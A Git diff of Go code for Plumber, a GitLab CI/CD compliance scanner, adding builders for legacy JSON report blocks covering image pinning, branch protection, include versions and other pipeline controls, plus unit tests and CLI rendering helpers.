+ o := _originByIncludeSource(result.PipelineOriginData, src)
+ if o == nil {
+ continue
+ }
+ latest := ""
+ plumberPath := ""
+ if o.FromPlumber {
+ latest = o.PlumberOrigin.LatestVersion
+ plumberPath = o.PlumberOrigin.Path
+ } else if o.FromGitlabCatalog {
+ latest = o.GitlabComponent.ComponentLatestVersion
+ }
+ templateName := plumberPath
+ if templateName != "" && strings.Contains(templateName, "/") {
+ templateName = templateName[strings.LastIndex(templateName, "/")+1:]
+ }
+ componentName := o.GitlabComponent.ComponentName
+ if o.GitlabIncludeOrigin.Type == "component" && componentName == "" && o.GitlabIncludeOrigin.Location != "" {
+ loc := o.GitlabIncludeOrigin.Location
+ if strings.Contains(loc, "/") {
+ componentName = loc[strings.LastIndex(loc, "/")+1:]
+ }
+ }
+ issue["version"] = o.Version
+ if latest != "" {
+ issue["latestVersion"] = latest
+ }
+ if plumberPath != "" {
+ issue["plumberOriginPath"] = plumberPath
+ }
+ includeLoc := o.GitlabIncludeOrigin.Location
+ if includeLoc == "" {
+ includeLoc = o.GitlabComponent.ComponentIncludePath
+ }
+ if includeLoc != "" {
+ issue["gitlabIncludeLocation"] = includeLoc
+ }
+ if t := o.GitlabIncludeOrigin.Type; t != "" {
+ issue["gitlabIncludeType"] = t
+ }
+ if pr := o.GitlabIncludeOrigin.Project; pr != "" {
+ issue["gitlabIncludeProject"] = pr
+ }
+ issue["nested"] = o.Nested
+ if componentName != "" {
+ issue["componentName"] = componentName
+ }
+ if templateName != "" {
+ issue["plumberTemplateName"] = templateName
+ }
+ issue["originHash"] = o.OriginHash
+ }
+}
+
+func buildImageForbiddenTagsBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
+ total := 0
+ notPinned := 0
+ usingForbidden := 0
+ if result.PipelineImageData != nil {
+ total = len(result.PipelineImageData.Images)
+ for _, img := range result.PipelineImageData.Images {
+ if !utils.HasDigestPin(img.Link) {
+ notPinned++
+ }
+ }
+ }
+ for _, f := range findings {
+ if f.Code == string(control.CodeImageForbiddenTag) {
+ usingForbidden++
+ }
+ }
+ mustBePinned := false
+ if pc.Controls.ContainerImageMustNotUseForbiddenTags != nil {
+ mustBePinned = pc.Controls.ContainerImageMustNotUseForbiddenTags.IsPinnedByDigestRequired()
+ }
+	// Sort findings deterministically by job so consumer snapshots
+	// stay stable across runs. The previous ordering came out of Go
+	// map iteration and is not reproducible itself; alphabetic-by-job
+	// gives at least a single canonical ordering on the dev side.
+ return map[string]any{
+ "issues": projectFindings(_sortedFindings(findings), "job"),
+ "metrics": map[string]any{
+ "total": total,
+ "usingForbiddenTags": usingForbidden,
+ "notPinnedByDigest": notPinned,
+ "pinnedByDigest": total - notPinned,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.4.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ "mustBePinnedByDigest": mustBePinned,
+ }
+}
+
+func buildImageAuthorizedSourcesBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := 0
+ if result.PipelineImageMetrics != nil {
+ total = int(result.PipelineImageMetrics.Total)
+ }
+ unauthorized := len(findings)
+ authorized := total - unauthorized
+ if authorized < 0 {
+ authorized = 0
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "total": total,
+ "authorized": authorized,
+ "unauthorized": unauthorized,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
// buildBranchProtectionBlock renders the legacy JSON block for the
// branch-protection control: aggregate metrics, a per-branch `data`
// list restricted to branches covered by the protection policy, and
// (only when non-empty) an enriched `issues` list.
func buildBranchProtectionBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
	total, toProtect, protected, unprotected := _branchProtectionCounts(result, pc)
	// Count only ISSUE-505 (non-compliant) findings; ISSUE-501
	// (unprotected) findings are covered by `unprotected` above.
	nonCompliant := 0
	for _, f := range findings {
		if f.Code == string(control.CodeBranchNonCompliant) {
			nonCompliant++
		}
	}
	data := []map[string]any{}
	if result.ProtectionData != nil && pc.Controls.BranchMustBeProtected != nil {
		cfg := pc.Controls.BranchMustBeProtected
		policyPatterns := cfg.NamePatterns
		defaultProtected := cfg.DefaultMustBeProtected != nil && *cfg.DefaultMustBeProtected
		// Mirror v0.2.x: only branches that fall under the project's
		// protection policy land in `data` — non-policy branches are
		// noise for compliance consumers and bloat the JSON. For each
		// kept branch we surface the full protection settings vs the
		// authorized thresholds, so consumers see at a glance which
		// dimension breaks the contract.
		authMerge := 0
		if cfg.MinMergeAccessLevel != nil {
			authMerge = *cfg.MinMergeAccessLevel
		}
		authPush := 0
		if cfg.MinPushAccessLevel != nil {
			authPush = *cfg.MinPushAccessLevel
		}
		// Index protections by the matched branch so we can read the
		// concrete settings (force-push, access levels) per branch.
		// The `seen` guard makes the FIRST matching protection win;
		// later patterns cannot override an earlier match.
		protectionByBranch := map[string]int{}
		for i := range result.ProtectionData.BranchProtections {
			pattern := result.ProtectionData.BranchProtections[i].ProtectionPattern
			for _, name := range result.ProtectionData.Branches {
				if _, seen := protectionByBranch[name]; seen {
					continue
				}
				if _matchesAnyGlob(name, []string{pattern}) {
					protectionByBranch[name] = i
				}
			}
		}
		// v0.2.x exposes the full protection settings (allowForcePush,
		// access levels, authorized thresholds) only on branches that
		// fired a non-compliance finding — compliant branches keep
		// the slim {branchName, default, protected} shape so the JSON
		// stays focused on what reviewers need to act on.
		// NOTE: findings carry the branch name in the Job field.
		nonCompliantBranches := map[string]bool{}
		for _, f := range findings {
			if f.Code == string(control.CodeBranchNonCompliant) {
				nonCompliantBranches[f.Job] = true
			}
		}
		// Iterate the branches with the default branch first, then the
		// rest sorted alphabetically — matches v0.2.x's display order
		// where the project's flagship branch leads the data list.
		ordered := make([]string, 0, len(result.ProtectionData.Branches))
		if result.DefaultBranch != "" {
			for _, b := range result.ProtectionData.Branches {
				if b == result.DefaultBranch {
					ordered = append(ordered, b)
					break
				}
			}
		}
		others := make([]string, 0, len(result.ProtectionData.Branches))
		for _, b := range result.ProtectionData.Branches {
			if b != result.DefaultBranch {
				others = append(others, b)
			}
		}
		sort.Strings(others)
		ordered = append(ordered, others...)
		for _, name := range ordered {
			// A branch is "in policy" when it matches a configured
			// pattern, or when it is the default branch and the
			// defaultMustBeProtected toggle is on.
			matchesPolicy := _matchesAnyGlob(name, policyPatterns)
			if !matchesPolicy && defaultProtected && name == result.DefaultBranch {
				matchesPolicy = true
			}
			if !matchesPolicy {
				continue
			}
			entry := map[string]any{
				"branchName": name,
				"default":    name == result.DefaultBranch,
				"protected":  false,
			}
			if idx, ok := protectionByBranch[name]; ok {
				p := &result.ProtectionData.BranchProtections[idx]
				entry["protected"] = true
				if nonCompliantBranches[name] {
					entry["allowForcePush"] = p.AllowForcePush
					entry["minMergeAccessLevel"] = _minAccessLevelGitlab(p.MergeAccessLevels)
					entry["minPushAccessLevel"] = _minAccessLevelGitlab(p.PushAccessLevels)
					entry["authorizedMinMergeAccessLevel"] = authMerge
					entry["authorizedMinPushAccessLevel"] = authPush
				}
			}
			data = append(data, entry)
		}
	}
	// branchProtection projects findings as `issues` with the branch
	// fields the legacy format documented (type, branchName, force-
	// push toggles, access levels). The ISSUE-501/505 rules emit
	// these directly so we just strip Rego-only fields. v0.2.19
	// omits the `issues` key entirely when the list is empty rather
	// than emitting `"issues": []`; reproduce that quirk so byte-for-
	// byte JSON consumers (snapshot tests, etc.) stay aligned.
	block := map[string]any{
		"enabled":    !c.Skipped,
		"compliance": c.Compliance,
		"version":    "0.2.0",
		"data":       data,
		"metrics": map[string]any{
			"branches":                   total,
			"branchesToProtect":          toProtect,
			"unprotectedBranches":        unprotected,
			"nonCompliantBranches":       nonCompliant,
			"totalProtectedBranches":     protected,
			"projectsCorrectlyProtected": protected - nonCompliant,
		},
	}
	if len(findings) > 0 {
		issues := projectFindings(findings, "")
		enrichBranchProtection505IssueMaps(issues, result, pc)
		block["issues"] = issues
	}
	return block
}
+
+func buildHardcodedJobsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := uint(0)
+ hardcoded := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ total = result.PipelineOriginMetrics.JobTotal
+ hardcoded = result.PipelineOriginMetrics.JobHardcoded
+ }
+ return map[string]any{
+ "issues": projectFindings(_sortedFindings(findings), "jobName"),
+ "metrics": map[string]any{
+ "total": total,
+ "hardcodedJobs": hardcoded,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildOutdatedIncludesBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := _externalIncludeCount(result)
+ outdated := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ outdated = result.PipelineOriginMetrics.OriginOutdated
+ }
+ // Outdated-include issues drop the `job` field; the legacy shape
+ // already carries the include path under `gitlabIncludeLocation`.
+ // Sort by include location so the JSON stays deterministic across
+ // runs (Rego's set iteration order does not).
+ issues := projectFindings(_sortedFindings(findings), "")
+ sort.SliceStable(issues, func(i, j int) bool {
+ a, _ := issues[i]["gitlabIncludeLocation"].(string)
+ b, _ := issues[j]["gitlabIncludeLocation"].(string)
+ return a < b
+ })
+ // originHash is uint64. The Rego pipeline marshals it as a JSON
+ // number, OPA loads it as float64 (losing precision past 2^53),
+ // then emits it back the same way. Re-inject the precise integer
+ // from the IR by matching on the include location.
+ hashByLocation := map[string]uint64{}
+ if result.PipelineOriginData != nil {
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc != "" && o.OriginHash != 0 {
+ hashByLocation[loc] = o.OriginHash
+ }
+ }
+ }
+ for _, iss := range issues {
+ if loc, ok := iss["gitlabIncludeLocation"].(string); ok {
+ if h, ok := hashByLocation[loc]; ok {
+ iss["originHash"] = h
+ }
+ }
+ }
+ return map[string]any{
+ "issues": issues,
+ "metrics": map[string]any{
+ "total": total,
+ "originOutdated": outdated,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildForbiddenVersionsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ total := _externalIncludeCount(result)
+ usingForbidden := len(findings)
+ usingAuthorized := total - usingForbidden
+ if usingAuthorized < 0 {
+ usingAuthorized = 0
+ }
+ issues := projectFindings(findings, "job")
+ enrichForbiddenVersion404IssueMaps(issues, result)
+ return map[string]any{
+ "issues": issues,
+ "metrics": map[string]any{
+ "total": total,
+ "usingForbiddenVersion": usingForbidden,
+ "usingAuthorizedVersion": usingAuthorized,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildRequirementGroupsBlock(c legacyCommon, cfg *configuration.RequiredComponentsControlConfig, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ var groups [][]string
+ if cfg != nil && !c.Skipped {
+ groups = cfg.RequiredGroups
+ }
+ requirementGroups, satisfied := _resolveRequirementGroups(groups, result)
+ return map[string]any{
+ "requirementGroups": requirementGroups,
+ "issues": projectFindings(findings, "job"),
+ "overriddenIssues": []any{},
+ "metrics": map[string]any{
+ "totalGroups": len(requirementGroups),
+ "satisfiedGroups": satisfied,
+ "anySatisfiedGroup": len(requirementGroups) > 0 && satisfied > 0,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.2.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildRequirementGroupsTemplateBlock(c legacyCommon, cfg *configuration.RequiredTemplatesControlConfig, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ var groups [][]string
+ if cfg != nil && !c.Skipped {
+ groups = cfg.RequiredGroups
+ }
+ requirementGroups, satisfied := _resolveRequirementGroups(groups, result)
+ return map[string]any{
+ "requirementGroups": requirementGroups,
+ "issues": projectFindings(findings, "job"),
+ "overriddenIssues": []any{},
+ "metrics": map[string]any{
+ "totalGroups": len(requirementGroups),
+ "satisfiedGroups": satisfied,
+ "anySatisfiedGroup": len(requirementGroups) > 0 && satisfied > 0,
+ "ciInvalid": 0,
+ "ciMissing": 0,
+ },
+ "compliance": c.Compliance,
+ "version": "0.2.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+// _resolveRequirementGroups expands each AND-group into the legacy
+// {requiredOrigins, foundOrigins, missingOrigins, overriddenOrigins,
+// isFullySatisfied} shape by matching every requirement string
+// against the origins the GitLab collector tracked. A requirement is
+// satisfied when an origin's normalised path equals it; it is also
+// flagged "overridden" when CollectOverriddenJobs returned at least
+// one entry for that origin.
+func _resolveRequirementGroups(groups [][]string, result *control.AnalysisResult) ([]map[string]any, int) {
+ out := make([]map[string]any, 0, len(groups))
+ satisfied := 0
+ // Build a path β overridden lookup so a single pass over each
+ // requirement can answer both "is it present?" and "is it
+ // overridden?" without rescanning origins per check.
+ originIsOverridden := map[string]bool{}
+ knownPaths := map[string]bool{}
+ if result != nil && result.PipelineOriginData != nil {
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == "" {
+ loc = o.GitlabComponent.ComponentIncludePath
+ }
+ if loc == "" {
+ continue
+ }
+ cleaned := utils.CleanOriginPath(loc)
+ knownPaths[cleaned] = true
+ for _, ov := range o.Jobs {
+ if ov.IsOverridden {
+ originIsOverridden[cleaned] = true
+ break
+ }
+ }
+ }
+ }
+ for idx, required := range groups {
+ found := []string{}
+ missing := []string{}
+ overridden := []string{}
+ for _, want := range required {
+ if knownPaths[want] {
+ found = append(found, want)
+ if originIsOverridden[want] {
+ overridden = append(overridden, want)
+ }
+ continue
+ }
+ missing = append(missing, want)
+ }
+ isFull := len(missing) == 0
+ if isFull {
+ satisfied++
+ }
+ out = append(out, map[string]any{
+ "groupIndex": idx,
+ "requiredOrigins": required,
+ "foundOrigins": found,
+ "missingOrigins": missing,
+ "overriddenOrigins": overridden,
+ "isFullySatisfied": isFull,
+ })
+ }
+ return out, satisfied
+}
+
+func buildDebugTraceBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "totalVariablesChecked": _countAllVariableBindings(result),
+ "forbiddenFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildVariableInjectionBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "jobsChecked": jobs,
+ "totalScriptLinesChecked": _countScriptLines(result),
+ "unsafeExpansionsFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildSecurityJobsBlock(c legacyCommon, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "securityJobsFound": _countSecurityJobs(result, pc),
+ "weakenedJobs": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildUnverifiedScriptsBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "jobsChecked": jobs,
+ "totalScriptLinesChecked": _countScriptLines(result),
+ "unverifiedScriptsFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildJobVariablesOverrideBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ return map[string]any{
+ "issues": projectFindings(findings, "job"),
+ "metrics": map[string]any{
+ "totalVariablesChecked": _countProjectAuthoredVariables(result),
+ "overriddenFound": len(findings),
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
+
+func buildDockerInDockerBlock(c legacyCommon, result *control.AnalysisResult, findings []opaengine.Finding) map[string]any {
+ jobs := 0
+ if result.PipelineOriginMetrics != nil {
+ jobs = int(result.PipelineOriginMetrics.JobTotal)
+ }
+ insecure := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeDockerInDockerInsecure) {
+ insecure++
+ }
+ }
+ return map[string]any{
+ "issues": projectFindings(findings, "jobName"),
+ "metrics": map[string]any{
+ "totalJobsChecked": jobs,
+ "dindServicesFound": _countDinDServices(result),
+ "insecureDaemonFound": insecure,
+ },
+ "compliance": c.Compliance,
+ "version": "0.1.0",
+ "ciValid": c.CiValid,
+ "ciMissing": c.CiMissing,
+ "skipped": c.Skipped,
+ }
+}
diff --git a/cmd/legacy_json_enrich_test.go b/cmd/legacy_json_enrich_test.go
new file mode 100644
index 0000000..355e0f7
--- /dev/null
+++ b/cmd/legacy_json_enrich_test.go
@@ -0,0 +1,111 @@
+package cmd
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ "github.com/getplumber/plumber/gitlab"
+)
+
// TestEnrichBranchProtection505IssueMaps_LegacyDisplays verifies that
// an ISSUE-505 issue map is enriched with the legacy display flags:
// the fixture's protection (force-push on, code-owner approval off,
// access levels 30) violates every configured threshold (force-push
// forbidden, code-owner required, min levels 40), so each *Display
// flag must come back true and the raw setting must be surfaced.
func TestEnrichBranchProtection505IssueMaps_LegacyDisplays(t *testing.T) {
	t.Parallel()
	f := false
	min40 := 40
	pc := &configuration.PlumberConfig{
		Controls: configuration.ControlsConfig{
			BranchMustBeProtected: &configuration.BranchProtectionControlConfig{
				AllowForcePush:            &f,
				CodeOwnerApprovalRequired: boolPtr(true),
				MinMergeAccessLevel:       &min40,
				MinPushAccessLevel:        &min40,
			},
		},
	}
	result := &control.AnalysisResult{
		ProtectionData: &collector.GitlabProtectionAnalysisData{
			BranchProtections: []gitlab.BranchProtection{
				{
					ProtectionPattern:         "main",
					AllowForcePush:            true,
					CodeOwnerApprovalRequired: false,
					PushAccessLevels:          []gitlab.BranchProtectionAccessLevel{{AccessLevel: 30}},
					MergeAccessLevels:         []gitlab.BranchProtectionAccessLevel{{AccessLevel: 30}},
				},
			},
		},
	}
	// Minimal ISSUE-505 issue map; `job` carries the branch name.
	issues := []map[string]any{{
		"code":       string(control.CodeBranchNonCompliant),
		"docUrl":     "x",
		"branchName": "main",
		"job":        "main",
	}}
	enrichBranchProtection505IssueMaps(issues, result, pc)
	iss := issues[0]
	// Raw setting surfaced from the matched protection.
	if iss["codeOwnerApprovalRequired"] != false {
		t.Fatalf("codeOwnerApprovalRequired: got %v", iss["codeOwnerApprovalRequired"])
	}
	// Each *Display flag marks a dimension that breaks the contract.
	if iss["allowForcePushDisplay"] != true {
		t.Fatalf("allowForcePushDisplay: got %v", iss["allowForcePushDisplay"])
	}
	if iss["codeOwnerApprovalRequiredDisplay"] != true {
		t.Fatalf("codeOwnerApprovalRequiredDisplay: got %v", iss["codeOwnerApprovalRequiredDisplay"])
	}
	if iss["minMergeAccessLevelDisplay"] != true {
		t.Fatalf("minMergeAccessLevelDisplay: got %v", iss["minMergeAccessLevelDisplay"])
	}
	if iss["minPushAccessLevelDisplay"] != true {
		t.Fatalf("minPushAccessLevelDisplay: got %v", iss["minPushAccessLevelDisplay"])
	}
}
+
// boolPtr returns a pointer to a fresh copy of b (test helper).
func boolPtr(b bool) *bool {
	v := b
	return &v
}
+
// TestEnrichForbiddenVersion404IssueMaps_OriginFields verifies that
// an ISSUE-404 issue map is enriched with the origin fields read from
// the IR: version, include location/type, nested flag, and the exact
// uint64 originHash (not the float64 the Rego round-trip produces).
// The issue is matched to its origin via the `job` field, which
// carries the include location.
func TestEnrichForbiddenVersion404IssueMaps_OriginFields(t *testing.T) {
	t.Parallel()
	result := &control.AnalysisResult{
		PipelineOriginData: &collector.GitlabPipelineOriginData{
			Origins: []collector.GitlabPipelineOriginDataFull{
				{
					GitlabPipelineOriginDataGeneric: collector.GitlabPipelineOriginDataGeneric{
						OriginType: "project",
						GitlabIncludeOrigin: gitlab.IncludeOriginWithoutRef{
							Location: "file@1.0.0",
							Type:     "file",
							Project:  "g/x",
						},
						OriginHash: 99,
					},
					GitlabPipelineOriginDataProjectSpecific: collector.GitlabPipelineOriginDataProjectSpecific{
						Version: "1.0.0",
						Nested:  true,
					},
				},
			},
		},
	}
	issues := []map[string]any{{
		"code":   string(control.CodeIncludeForbiddenVersion),
		"docUrl": "x",
		"job":    "file@1.0.0",
	}}
	enrichForbiddenVersion404IssueMaps(issues, result)
	iss := issues[0]
	if iss["version"] != "1.0.0" {
		t.Fatalf("version: got %v", iss["version"])
	}
	if iss["gitlabIncludeLocation"] != "file@1.0.0" {
		t.Fatalf("gitlabIncludeLocation: got %v", iss["gitlabIncludeLocation"])
	}
	if iss["gitlabIncludeType"] != "file" {
		t.Fatalf("gitlabIncludeType: got %v", iss["gitlabIncludeType"])
	}
	if iss["nested"] != true {
		t.Fatalf("nested: got %v", iss["nested"])
	}
	// Must be the precise integer, not a float64.
	if iss["originHash"] != uint64(99) {
		t.Fatalf("originHash: got %v", iss["originHash"])
	}
}
diff --git a/cmd/render_details.go b/cmd/render_details.go
new file mode 100644
index 0000000..d672eae
--- /dev/null
+++ b/cmd/render_details.go
@@ -0,0 +1,794 @@
+package cmd
+
+import (
+ "cmp"
+ "fmt"
+ "slices"
+ "sort"
+ "strings"
+
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/getplumber/plumber/control"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/utils"
+)
+
// statLine is a single labelled metric rendered above the findings
// listing of a findingGroup. Values are free-form strings so each
// converter can format numbers however it needs (plain int, percent…).
type statLine struct {
	Label string // metric name, printed left of the colon
	Value string // preformatted value string
}
+
// detailedFinding is the unified shape used to render per-rule detail
// listings, independent of the original source. Message is printed
// verbatim; Location, when set, is rendered as a clickable file:line
// path right after the message so editors and terminals that detect
// source references (VS Code, IntelliJ, iTerm, ...) can jump straight
// to the offending job.
type detailedFinding struct {
	Code     control.ErrorCode // rule code printed in brackets, e.g. ISSUE-505
	Message  string            // headline, printed verbatim
	DocURL   string            // optional documentation link rendered after the message
	Location string            // optional "file:line" source reference
	// DetailLines is optional (e.g. ISSUE-505: one headline, several sub-reasons).
	DetailLines []string
}
+
// findingGroup collects everything needed to render one per-rule
// section: its title, compliance, optional stats block, and the list
// of findings.
type findingGroup struct {
	Title      string            // control title shown in the section header
	Compliance float64           // compliance value printed next to the title
	Skipped    bool              // control disabled in configuration
	Stats      []statLine        // optional labelled metrics printed above findings
	Findings   []detailedFinding // findings rendered under "Issues Found"
}
+
// renderFindingGroups prints each group in the canonical Plumber
// format used across providers: horizontal separator header with the
// rule title and compliance (or "skipped"), the stat lines, and an
// "Issues Found" listing with severity tag, code, message and doc URL.
// Groups with no stats, no findings and not marked skipped are not
// rendered (they would just be empty noise).
func renderFindingGroups(groups []findingGroup) {
	for _, g := range groups {
		// Skip groups that would render nothing but a bare header.
		if !g.Skipped && len(g.Stats) == 0 && len(g.Findings) == 0 {
			continue
		}
		printControlHeader(g.Title, g.Compliance, g.Skipped)
		if g.Skipped {
			fmt.Printf(" %sStatus: SKIPPED (disabled in configuration)%s\n\n", colorDim, colorReset)
			continue
		}
		// Stat lines render above the findings listing.
		for _, s := range g.Stats {
			fmt.Printf(" %s: %s\n", s.Label, s.Value)
		}
		if len(g.Findings) > 0 {
			fmt.Printf("\n %sIssues Found:%s\n", colorYellow, colorReset)
			for _, f := range g.Findings {
				tag := severityTag(f.Code)
				fmt.Printf(" %s [%s] %s\n", tag, f.Code, f.Message)
				// Optional sub-reasons (e.g. ISSUE-505) indent under the headline.
				for _, line := range f.DetailLines {
					fmt.Printf(" ββ %s\n", line)
				}
				if f.Location != "" {
					// The bare path is emitted last so VS Code, iTerm
					// and similar tools detect it as a clickable
					// file:line reference and jump straight to the job.
					fmt.Printf(" %sβ³ at %s%s\n", colorDim, f.Location, colorReset)
				}
				if f.DocURL != "" {
					fmt.Printf(" %sβ³ docs: %s%s\n", colorDim, f.DocURL, colorReset)
				}
			}
		}
		fmt.Println()
	}
}
+
+// formatFindingLocation returns "file:line" when both fields are set,
+// "file" when only File is set, and "" otherwise. The Line suffix
+// lets editors and terminals that detect source references jump
+// straight to the offending job (Ctrl-click in VS Code, Cmd-click
+// in iTerm, β¦).
+func formatFindingLocation(f opaengine.Finding) string {
+ if f.File == "" {
+ return ""
+ }
+ if f.Line > 0 {
+ return fmt.Sprintf("%s:%d", f.File, f.Line)
+ }
+ return f.File
+}
+
+// detailLinesFromFinding unpacks ISSUE-505 structured reasons into CLI sub-lines.
+func detailLinesFromFinding(f opaengine.Finding) []string {
+ if f.Code != string(control.CodeBranchNonCompliant) || f.Data == nil {
+ return nil
+ }
+ raw, ok := f.Data["reasons"]
+ if !ok || raw == nil {
+ return nil
+ }
+ lines := reasonsArrayToStrings(raw)
+ if len(lines) == 0 {
+ return nil
+ }
+ return sortBranchProtectionDetailLines(lines)
+}
+
// reasonsArrayToStrings coerces a decoded "reasons" value into a
// string slice. Accepts either a native []string or the []interface{}
// shape JSON decoding produces (non-string elements are dropped);
// any other type yields nil.
func reasonsArrayToStrings(raw interface{}) []string {
	if direct, ok := raw.([]string); ok {
		return direct
	}
	items, ok := raw.([]interface{})
	if !ok {
		return nil
	}
	result := make([]string, 0, len(items))
	for _, item := range items {
		if str, isStr := item.(string); isStr {
			result = append(result, str)
		}
	}
	return result
}
+
+// sortBranchProtectionDetailLines applies a stable product order (force push,
+// code owner, then other reasons lexicographically).
+func sortBranchProtectionDetailLines(lines []string) []string {
+ if len(lines) < 2 {
+ return lines
+ }
+ out := slices.Clone(lines)
+ slices.SortFunc(out, func(a, b string) int {
+ return cmp.Or(
+ cmp.Compare(branchProtectionDetailRank(a), branchProtectionDetailRank(b)),
+ cmp.Compare(a, b),
+ )
+ })
+ return out
+}
+
// branchProtectionDetailRank maps an ISSUE-505 reason line to its
// display rank: force-push first, then code-owner, then merge/push
// access levels; anything unrecognized sorts last (rank 50).
func branchProtectionDetailRank(s string) int {
	ranked := []struct {
		prefix string
		rank   int
	}{
		{"Force push", 0},
		{"Code owner", 1},
		{"Merge access level", 2},
		{"Push access level", 3},
	}
	for _, r := range ranked {
		if strings.HasPrefix(s, r.prefix) {
			return r.rank
		}
	}
	return 50
}
+
+// sortBranchProtectionFindingsForDisplay prints ISSUE-505 before ISSUE-501 so the
+// protected-but-misconfigured branch appears above plain unprotected branches.
+func sortBranchProtectionFindingsForDisplay(findings []opaengine.Finding) {
+ if len(findings) < 2 {
+ return
+ }
+ rank := func(code string) int {
+ switch code {
+ case "ISSUE-505":
+ return 0
+ case "ISSUE-501":
+ return 1
+ default:
+ return 10
+ }
+ }
+ slices.SortFunc(findings, func(a, b opaengine.Finding) int {
+ return cmp.Or(
+ cmp.Compare(rank(a.Code), rank(b.Code)),
+ cmp.Compare(a.Job, b.Job),
+ cmp.Compare(a.Message, b.Message),
+ )
+ })
+}
+
+// buildGitLabControlStats returns the legacy aggregated metrics that
+// the v0.2.x analyzer printed under each control header β the
+// "Total Images: 9 / Authorized: 9 / Unauthorized: 0" block. The
+// Rego engine emits findings only, so we recompute the totals here
+// from the IR data still attached to AnalysisResult, the user
+// configuration (for "checked-list" sizes), and the per-control
+// findings list (for denominators and code-specific counts such as
+// ISSUE-102 / ISSUE-505). Each control name matches the entry
+// registered by control.GitLabControls().
+func buildGitLabControlStats(controlName string, result *control.AnalysisResult, pc *configuration.PlumberConfig, findings []opaengine.Finding) []statLine {
+ if result == nil {
+ return nil
+ }
+ findingsCount := len(findings)
+ jobTotal := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ jobTotal = result.PipelineOriginMetrics.JobTotal
+ }
+ switch controlName {
